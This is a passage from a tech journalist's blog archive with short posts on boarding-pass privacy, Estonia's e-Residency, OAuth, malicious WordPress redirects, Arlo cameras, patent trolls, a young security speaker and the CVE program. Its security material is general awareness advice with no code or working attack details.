Time to really go paperless when it comes to boarding passes

Posted on by
Reply

I have been a big fan of paperless airline boarding passes almost since their introduction, and a recent post reminded me of yet another reason: they can become an easy way to compromise your identity. The reason is a combination of the low and high technology, all leveraging your smart phone’s camera.

The issue has to do with the way the airlines make it easy to use the printed bar code information to gain access to your flight details. Brian Krebs first wrote about this several years ago, and if you still use the printed boarding passes, the first thing you should know is that you shouldn’t post pictures of them on any of your social media outlets. Krebs found more than 90,000 such images exist when he did a quick search.

So here is what could happen. Criminals look for these photos, and could then use the QR code or the booking reference number to gain access to your flight details. Think about this for a moment. Let’s say you are on vacation, and you post your “here I am at the airport about to take off for a long trip on the other side of the planet” obligatory photo. Now someone comes along, and can change your return flight, or use this information to leverage more identity theft since the booking contains information such as your passport number and birthdate.

And of course, posting flight details is another way that criminals could decide to pay your unoccupied home a visit while you are away too.

Some folks purposely blur out the details about their name, but leave the barcode visible, such as this photo above, where we can find out her full name by scanning the barcode. Oops.

This method works for dumpster diving too. How many of us leave our used boarding papers on board the aircraft that we are leaving, thinking no use to me? I have done that several times. Again, someone could use that information to hijack my account. So avoid leaving your boarding pass in the trash at the airport or tucked into that seat-back pocket in front of you before deplaning. Instead, bring it home and shred it. And don’t take pictures of your boarding pass. Finally, be careful of spreading your “real” birthday around on social media. My “birthday” has been January 1 for several years: my real friends know when it actually is.

So go paperless when you can. And be careful what you post online.

Estonia leads the way in digital innovation

Posted on by
1

(updated Feb 2, 2018)

My father’s father emigrated to America from Lithuania about a hundred years ago, and one day I intend to visit the Baltic region and see the land for myself, as my sister and I did earlier this year when we visited my mother’s homeland in northeast Poland. In my mind, the next best thing is to follow the activities of Estonia, a neighboring nation that is doing some interesting things online. (I know, my mind works in strange ways. But bear with me, I needed an intro for this essay.)

One reason why I am interested in Estonia is something that they have had in place for many years called the e-Resident program. Basically, this is an ID card issued by their government, for use by anyone in the world. You don’t have to ever live there, or even want to live there. More people have signed up for this ID than are actual residents of the country, so it was a smart move by their government to widen their virtual talent pool. Once you have this ID, you can register a new business in a matter of minutes. Thousands of businesses have been started by e-Residents, which also helps to bring physical businesses there too. In many countries, offshore businesses are required to have a local director or local address. Not Estonia.

So last week, after thinking more about this, I finally took the e-Resident plunge. It costs about $100, you need to take a picture of your local passport and fill out a simple form. When the ID card is ready, you have to physically go and pick it up at a local Estonia embassy (either NYC or DC would be the closest places for me, I chose NYC). You select your pickup site when you register and can’t change it.

Well, as usual, it was bad timing for me. I should have waited a little bit longer. This week we learned that there are potential exploits with the ID cards, at least the cards that have been circulating for the past several years. Almost 750,000 cards are affected. According to Estonian officials, the risk is a theoretical one and there is no evidence of anyone’s digital identity actually being misused. It might change how the IDs are used in next month’s national elections, although they haven’t decided on that. About a third of their voters do vote online.

Update: They have issued a fix, which requires you to update the certs that are attached to your ID. So last week (January 2018), I went to their embassy in NYC and got my kit, which includes the ID card, a nifty little USB reader, and some very bare-bones instructions. My first attempt at installing the software on my Windows 10 laptop was met with failure. A second attempt on another Windows PC eventually worked. My biggest complaint is the tech support: an email to one address took several days for a reply, which told me to send it to another email address (in three different languages, no less). The ID card software (shown here) installs four different programs on your computer, each with somewhat similar names. The cert update process requires your full attention and a solid Internet connection: lacking either, and you will have to re-run it.

The ID card software is also somewhat finicky. It has a place for you to upload your photo, but that didn’t seem to work. You are assigned an official Estonian email address, which I wanted to try to forward to my actual email account, and instructions were lacking on how to do this.

So overall, I give Estonia a passing grade for e-Resident, but just barely. It is hard to use and still needs some work. If a member of the public isn’t computing savvy, they will have a hard time getting going with the whole process. Navigating the numerous web pages for help is tedious and daunting. If you are thinking about the program, I would recommend waiting until they work out the bugs.

Now back to my earlier blog post for some other background info.

Estonia is leading the world in other digital matters too. Lots of companies have disaster recovery data centers located far from their headquarters, but that is an issue with Estonia, which is small enough that far is a just a few minutes’ drive. So they came up with another plan to make Estonia the first government to build an off-site data center in another country. The government will make backup copies of its critical data infrastructure and store them in Luxembourg if agreements between the two countries are reached. My story in IBM’s Security Intelligence blog goes into more details of what they call their “data embassy.” They have lots of other big digital plans too, such as using 100% digitized textbooks in their education system by the end of the decade and a public sector data exchange facility with Finland they are putting in place for this year.

Earlier this year, I read about a course they offered called “Subversive Leverage and Psychological Defense” to master’s degree students at their Academy of Security Sciences. The students are preparing for positions in the Estonian Internal Security Service. The story from CSM Passcode goes into more details about how vigilant they have to be to fight Russian propaganda. These aren’t isolated examples of how sophisticated they are. They also were the first EU country to teach HTML coding in its elementary schools back in 2012, and the Skype software was developed there.

Their former Prime Minister Taavi Rõivas has even appeared on the The Daily Show with Trevor Noah to talk about these programs. Clearly, they have a strong vision, made all the more impressive by the fact that they had almost no Internet access just a few years ago when they were still part of the Soviet empire. Certainly a place to keep an eye on.

iBoss blog: What is OAuth and why should I care?

Posted on by
Reply

The number of choices for automating login authentication is a messy alphabet soup of standards and frameworks, including SAML, WS-Federation, OpenID Connect, OAuth, and many others. Today I will take a closer look at OAuth and recent developments that favor this standard.

The idea behind all of these standards is to automate the login process, so your users don’t have to remember their many login and passwords for connecting to various resources. That sounds great in theory, but getting the automation to work properly isn’t always easy or obvious. To pull this off, you have to conquer some technical challenges that involve just-in-time user provisioning, adapting to consumer-based SaaS services as well as supporting enterprise apps, and understanding exactly how they provide the automation itself.

OAuth began its life about seven years ago as an open standard that was created to handle authorization by Twitter and Google. It has seen a lot of revisions since then. OAuth now has two different versions in current usage; v2 is the most recent and more capable and more widely used. The two aren’t compatible and rely on two different sets of standards specifications (more specifically, RFC 5849, superseded by RFC 6749).  Today OAuth has dozens of supporters.

A good example of how OAuth is used is when two websites are trying to accomplish something on behalf of a user: both of them have to figure out how to approve the user and get that unit of work done.  If you have to think of it as something, don’t call it a protocol: it actually is the authorization plumbing inside the authentication protocols. A good explanation of the more technical underpinings of OAuth and its relationship to authentication and OpenID and SAML can be found here.

Okay, so having gotten that out of the way, where does OAuth show up in security practice? Typically, enterprises adopt OAuth through using a single sign-on tool, such as Ping Identity, Okta, or SecureAuth. These tools control the overall login process by connecting an identity provider, such as Active Directory, with a collection of applications. The actual process is that instead of a user directly entering their username and password into an app’s login screen, they work with an identity provider that encrypts and then federates their credentials to the apps as part of the authentication process. Once this chain of events is setup, a user doesn’t really see what happens: they click on an app and they are logged in properly. Corporate security managers like this process to be hidden, because then they don’t have to worry about resetting individual users’ passwords.

Another example is with iBoss’ Web Gateway Security. iBoss makes use of OAuth to integrate its security policies with users’ Google accounts to cover BYOD situations and manage guest wireless access. A customizable captive portal automatically binds these BYOD users to a variety of directory services including Active Directory, eDirectory, Open Directory, and LDAP.

Earlier this year, Google updated its G Suite with the ability to do OAuth apps whitelisting. This means that a site administrator can have more granular control over what third-party apps do with G Suite data. You can set up permissions for specific data types, such as allow access to your staff’s Google Drive documents but not their contact lists, for example. This prevents rogue apps from accessing data unintentionally.

OAuth isn’t perfect: attackers can still phish a user’s credentials during the authentication process using man-in-the-middle attacks, which is one of the reasons why Google is providing more control over OAuth across its SaaS app suite. And OAuth also doesn’t provide encryption or client verification: you will need to employ Transport Layer Security for these protective features. Nevertheless, it is being used for more apps and gaining wider acceptance, and should be a part of your security toolkit.

Stopping malicious website redirects

Posted on by
Reply

In my work as editor of Inside Security’s email newsletter, I am on the lookout for ways that criminals can take advantage of insecure Internet infrastructure. I came across this article yesterday that I thought I would share with you and also take some time to explain the concept of the malicious redirect. This is how the bad guys turn something that was designed to be helpful into an exploit.

A redirect is when you put some HTML code on a web page because that URL is no longer in service, but you don’t want to lose that visitor. The most likely situation is that someone could have clicked on an old link and gotten to that location. So you direct them to the appropriate place on your website. Simple right?

Now the bad guys have used this, but instead of being helpful, they use the redirect code to point you to a place that contains some malware, in the hopes that you will not notice that the new web page is a trap and in an instant, your computer is now infected with something. Surprise! Sadly, this happens more and more.

In a post on Sucuri’s blog, researchers describe several ways the malicious redirect can happen. One way is by leveraging configuration files such as .htacess or .ini files. These are files associated with web servers that control all sorts of behavior and are usually hidden from ordinary browsing. Usually, your website security prevents folks from messing with these files, but if you made setup errors or if you aren’t paying attention, the configuration files can be exposed to attackers. Another way is by having an attacker mess with your DNS settings so that visitors to your site end up going somewhere else. How does some attacker gain access to your DNS servers? Typically, it is through a compromised administrative account password. Do you really know who in your organization has access to this information? Probably more people than you realize. When was the last time you changed this password anyway?

My office is in a condo complex that has several doors to a public alley. Each of the doors has a combination lock and all of the doors have the same combination. A year or so ago, the board was discussing that it might be time to change the combination because many people – by design – know what this combination is. This is just good security practice. Now the analogy isn’t quite sound – by design a lot of people have to know this number, otherwise no one can get out to the alley to take their trash out – but still, it was a good idea to regularly change the access code.

Neither of these exploit methods is new: they have been happening almost since the web became popular, sadly. So it is important that if you run websites and don’t want your reputation ruined or have some criminal spreading malware that you at least understand what can happen and make sure that you are protected.

But there is another way redirects can happen: by an attacker grabbing an expired domain name and leveraging its associated WordPress plug-in. Since a lot of you run WordPress sites, I want to take a moment to describe this attack method.

  • Attacker finds a dormant plug-in on the WordPress catalog. Give the thousands of plug-ins, there are lots of them that haven’t been updated in several years.
  • Check the underlying domain name that is used for the plug-in. If it isn’t active, purchase and register the name.
  • Set up a website for this domain that contains malicious Javascript code for the redirect.
  • Change the code on your plug-in to serve up the malware whenever anyone uses it.
  • Hope no one notices and sit back as the Internet spread your nasty business far and wide.

Moral of the story: Don’t use outdated plug-ins, and limit the potential for attacks by deleting unused plug-ins from your WordPress servers anyway. Make use of a tool such as WordFence to protect your blogs. Update your blog with the latest versions of WordPress and the latest plug-in versions too while you are at it.

When I first started using WordPress more than a decade ago, I went plug-in crazy and loaded up more than a dozen different ones for all sorts of enhancements to my blog’s appearance and functions. Now I am more careful, and only run the ones that I absolutely need. Situations such as this malicious redirect are a good reason why you should follow a similar strategy.

FIR B2B podcast #79: How to find the right CMO for your startup

Posted on by
Reply

This week Paul Gillin and I talk to Crowded Ocean’s partners Carol Broadbent and Tom Hogan. The two have written The Ultimate Startup Guide, the foundation of which is their work with 47 different startups over the past 10 years. Ten of those companies have had successful exits, and only two went out of business, so our guests have credibility.

We invited them to join us after we read their piece in VentureBeat about “marketing-as-a-service.” Most organizations hire their CMOs first, but the duo recommend that this should actually be the last position to be filled by a startup. “Most CMOs have a bulls-eye painted on their backs, they have the shortest tenure, and often startups hire the wrong species,” they said.

Instead, Carol and Tom suggest that you examine more closely the different component skills that make up marketing, and staff accordingly. These include product management, corporate marketing, product marketing and IT fluency. The evolved CMO has the backbone of the marketing department, the breadth and understanding of the customer experience and the depth of a new key organizational growth pillar that shapes their point of view. Our guests suggest that the initial full-time marketing insider should be someone that they call “Seth” who is a 28-year-old numbers jockey who can give their sales organization demand generation data.

Other recommendations: Hire a stable of reliable contractors rather than fulfilling every need with full-timers. Simplify your website’s message. “Too many startups want to display all their great ideas and technology on their website, turning it into a library of brochure-ware that a prospect has to wade through,” they wrote in VentureBeat. And design online content and structure that can be useful on mobile devices.

Carol and Tom’s recommendations challenge a lot of the conventional wisdom, but they have the track record to justify them. Listen to our 21 min. podcast here:

Netgear’s Arlo Pro security cameras: Better than before but pricey

Posted on by
Reply

This article is the latest installment in my smart home series. A natural addition to any smart home would be to use security cameras to monitor your entry points. I tested the latest Netgear Arlo cameras, including the Arlo Pro and the Arlo Go. Overall, my review is mixed.   

Netgear has had its Arlo line for several years. What is new with these two units is the rechargeable batteries, so you don’t spend a small fortune on replacing the ones in the cameras. The design goal with Arlo is that you can run them completely cable-free, so you can place them optimally without regard to wiring. By that they mean that you don’t have to run any wires to them, either for power or network connectivity.

But there are two different battery sizes for the Pro and the Go models. Go includes a slightly larger unit that comes with its own stand. Pro has a smaller magnetic attachment device to be mounted on the wall.Either Pro or Go batteries can be recharged outside the camera with an optional $60 charging dock, which is included in some of the multiple-camera kits.  

The older Arlo models used ordinary batteries that drained quickly. These newer models use rechargeable ones that last a couple of weeks, depending on usage, and connect via Wi-Fi networks (in the case of the Pro) or Go has its own AT&T SIM card. That means the Go can be placed anywhere that has a cell signal, and if you don’t have any indoor Wifi. You can see the signal strength on its web portal page. This is great for a remote cabin the woods, as long as it isn’t too far afield from a cell tower.

Both of the newer cameras can record ambient audio and can see a 130 degree video view in HD quality, along with night vision rather at 850 nm that can see things up to 25 feet away. You can also control a 8x zoom lens in real time. The original Arlo cameras has a 110 degree view and no audio capabilities.  

Camera setup is very simple. You connect the controller to your wired network, download the smartphone app, and press the button on the controller and then on each camera for it to be recognized by the system. You need to create a login ID with the web service. One ID per system only. Once you have setup the cameras with this login, you can use the smartphone app outside of your home network.

You can only be logged in at one location: either via the smartphone app or the web portal. This is a security feature. The web and smartphone app controls are almost the same, with the exception of geo-fencing mode that is available on the phone app only.

The cameras have four different detection modes: armed, schedule, geo, and disarmed. The schedule mode allows you to turn off the detection during the weekend or when motion sensing would kick off too many alerts. You can also set up your own custom rules for all the cameras connected to your hub or for particular Go cameras.

You can set various thresholds — for motion (the claim is 23 feet from the camera) or sound detection. Then the cameras record the next ten seconds. When you purchase the camera, you get a free week’s worth of video storage in the cloud, after that you have to purchase a storage plan if you want to keep the videos for any length of time. (You can access your video library easily at any time, shown here.) You can download these videos as MP4s, and also share them with Netgear. If you use the Pro models, they attach to a local controller, which has two USB slots where you can fit a USB thumb drive for local storage. The Go units have a microSD slot where you can store your video recordings.

The biggest new feature of the Pro/Go cameras is audio, and it is two-way so you can get an alert via email and then talk remotely to someone who has stopped by your lake house and knocked on your door when you aren’t home as an example. You can also set off a very loud alarm remotely if you see something amiss.

The Arlo setup comes with a free basic subscription plan. This covers up to five cameras and up to seven days of 1 GB of cloud storage for your recordings. There are a variety of paid consumer and business plans that up the level and duration of storage and the number of cameras per account, these start at $100/year per account. The cameras retail for $950 in a kit that includes six Pro cameras, several wall mount options, power chargers and a base station. A single camera system is $250. The Go camera on the Verizon cellular network retails for $350, plus $85 a month, provided you sign a two-year contract.

If you have an older Arlo setup, it probably isn’t worth it to upgrade to Pro or Go collection. If you are looking for a smart home webcam, you can certainly find cheaper models that will require some wiring, or use ordinary batteries. It might be worthwhile to have a single Arlo Pro or a Go in the case of the remote cabin without any Internet connection. If you don’t mind replacing batteries and don’t need the two-way audio, you should stick with the older Arlo models.

iBoss blog: The Dark Side of SSL Certificates

Posted on by
Reply

The world of SSL certificates is changing, as the certs become easier to obtain and more frequently used. In general, having a secure HTTP-based website is a good thing: the secure part of the protocol means it is more difficult to eavesdrop on any conversation between your browser and the web server. Despite their popularity, there is a dark side to them as well. Let’s take a closer look at my iBoss blog post this week.

The scourge of patent trolls

Posted on by
3

One of the tech industry’s dirty secrets is enabling an entire class of bottom-feeders called the patent troll. These are lawyers that exist solely to sue other

 firms and bleed them dry from the threat of patent infringement. A new documentary is out by Austin Meyer (shown here), who suffered from one troll purely because he uploaded his app to the Google Play store. The troll claimed his patent covered such activity, which is just utter nonsense. As shown in Meyer’s movie, almost all defendants settle patent cases to avoid the costs of discovery and a protracted legal battle. There are several thousand troll-based lawsuits filed annually, and the number is increasing.

Sadly, what these trolls do is also perfectly legal. But what gets my goat is that the trolls don’t actually make anything: it isn’t like they have a competitive product line that they are trying to protect with their lawsuit. They are really just racketeers, extortion con men. Many of these firms, like Virnetx and Uniloc, are companies that you never heard of, and are getting rich from these troll payouts.

For example, several years ago Virnetx beat Apple and now gets $300M a year in royalties because Facetime was claimed to infringe on secure network communications patents it held. That took years to work its way through the courts in eastern Texas.

Wait a minute. Why Texas? Isn’t Apple’s HQ in California? Yes, but until recently, trolls could file wherever they pleased. Many of the patent cases are tried in eastern Texas, because the area’s court system is especially friendly to trolls. For example, in the small town of Marshall, Judge Rodney Gilstrap oversaw more than a quarter of the country’s patent cases in 2015, reports the Electronic Frontier Foundation. Marshall figures prominently in Meyer’s movie, where he takes us literally on a tour of the empty offices across the street from the county courthouse where these patent cases are tried. All these offices are quite representative of these shell companies that are the trolls.

One delightful tidbit that he missed was that hotels in Marshall are so commonly frequented by lawyers that one even purchased a subscription to the electronic court-records system Pacer. You have in-room Wi-Fi, now there is in-room legal records search. How convenient. Earlier in May this year the US Supreme Court unanimously ruled that a defendant should only face patent litigation in the state where it’s incorporated, which for many tech businesses are either in California or Delaware. Meyer tells me that that hasn’t really stemmed the tide in Marshall, so probably that hotel will keep their in-room Pacer subscription.

Not all trolls succeed. In one case, Uniloc was defeated when a group of gaming companies showed the flaws in their argument in a case that was decided by an internal review by the US Patent office earlier this year. Uniloc is one of the more notorious trolls, but this is a minor setback: they have a huge collection of judgements from other cases. Uniloc was who sued Meyer, btw.

One of the issues mentioned in Meyer’s movie is how once the trolls identify a potential victim (not too small and not too large, so that the firm will be motivated to payout rather than fight), they are often hit repeatedly by other trolls. The typical lawsuit will cost several million dollars. Another issue: trolls sue people that use the patented idea, no matter how ridiculous the patent may be.  

Patent trolls isn’t a new topic, indeed there is another documentary by Lex Lybrand called The Trolls that came out last year that documents his experience, when his crowdfunded company was hit by a troll. And John Oliver did one of his HBO Last Week Tonight shows on patents a few years ago. (He illustrates his points with several great Shark Tank snippets.)  Meyer is also featured on Oliver’s segment.

Meyer has several suggestions for improving the patent process, and many of them have little hope of happening, thanks to trial lawyer lobbies and other market forces. But if you want to see how broken our patent system is, the movie is well worth your time.

Meyer’s movie, The Patent Scam, is now available for a fee to download and soon will be on Netflix and other streaming services.

Learning from a great public speaker, Reuben Paul

Posted on by
3

I got a chance to witness a top-rated speaker ply his trade at a conference that I attended this week here in St. Louis. The conference was a gathering of several hundred people who work in IT for our intelligence agencies, called DoDIIS. When I signed up for press credentials, I didn’t know he was going to be speaking, but glad that I could see him in action. As someone who speaks professionally at similar groups, I like to learn from the best, and he was certainly in that category.

The odd thing about this person is that he is still a kid, an 11-year-old to be exact. His name is Reuben Paul and he lives in Austin. Reuben already has spoken at numerous infosec conferences around the world, and he “owned the room,” as one of the generals who runs one of the security services mentioned in a subsequent speech. What made Reuben (I can’t quite bring myself to use his last name as common style dictates, sorry) so potent a speaker is that he was funny and self-depreciating as well as informative. He was both entertaining as well as instructive. He did his signature story, as we in the speaking biz like to call it, a routine where he hacks into a plush toy teddy bear (shown here sitting next to him on the couch along with Janice Glover-Jones, who is the CIO for the Defense Intelligence Agency) using a Raspberry Pi connected to his Mac.

The bear makes use of a Bluetooth connection to the Internet, along with a microphone to pick up ambient sound. In a matter of minutes, Reuben was showing the audience how he was able to record a snippet of audio and play it back on the bear’s speaker, using some common network discovery tools and Python commands. Yes, the kid knows Python: something that impressed several of the parade of military generals who spoke afterwards. These generals semi-seriously were vying to get the kid to work for their intelligence service agencies once he was no longer subject to child labor restrictions.

The kid is also current with the security issues of the Internet of Things, and can show you how an innocent toy can become the leverage point for hackers to enter your home and take control without your knowledge. This has become very topical, given the recent attacks using WannaCry, Petya and others that target these connected objects.

Reuben also managed to shame the IT professionals attending the conference. As the video monitors on stage were showing him scrolling down the list of network addresses from phones that were broadcasting their Bluetooth signals, he told us, “if you see your phone listed here, you might remember next time to turn off your Bluetooth for your own protection.” That got a laugh from the audience. Yes, this kid was shaming us and no one got upset! We were in the presence of a truly gifted speaker. I had made a similar point in my speech just a couple of weeks ago about Bluetooth vulnerability, and much less adroitly.

Reuben isn’t just a one-trick pony (or bear), either. The kid has set up several businesses already, which is impressive enough even without considering his public speaking prowess. One of them is this one that helps teach kids basic cybersecurity concepts. Clearly, he knows his audience, which is another tenet of a good speaker. If you ever get a chance to see him in person, do make the effort.

iBoss blog: What Is the CVE and Why It Is Important

Posted on by
Reply

The Common Vulnerabilities and Exposures (CVE) program was launched in 1999 by MITRE to identify and catalog vulnerabilities in software or firmware and create a free lexicon to help organizations improve their security. Since its creation, the program has been very successful and is now used to link together different vulnerabilities and to facilitate the comparison of security tools and services. You now see evidence of its work by the unique CVE number that accompanies a malware announcement by a security researcher.

In my latest blog post for iBoss, I look at how the CVE got started and where it used and the importance it plays in sharing threat information.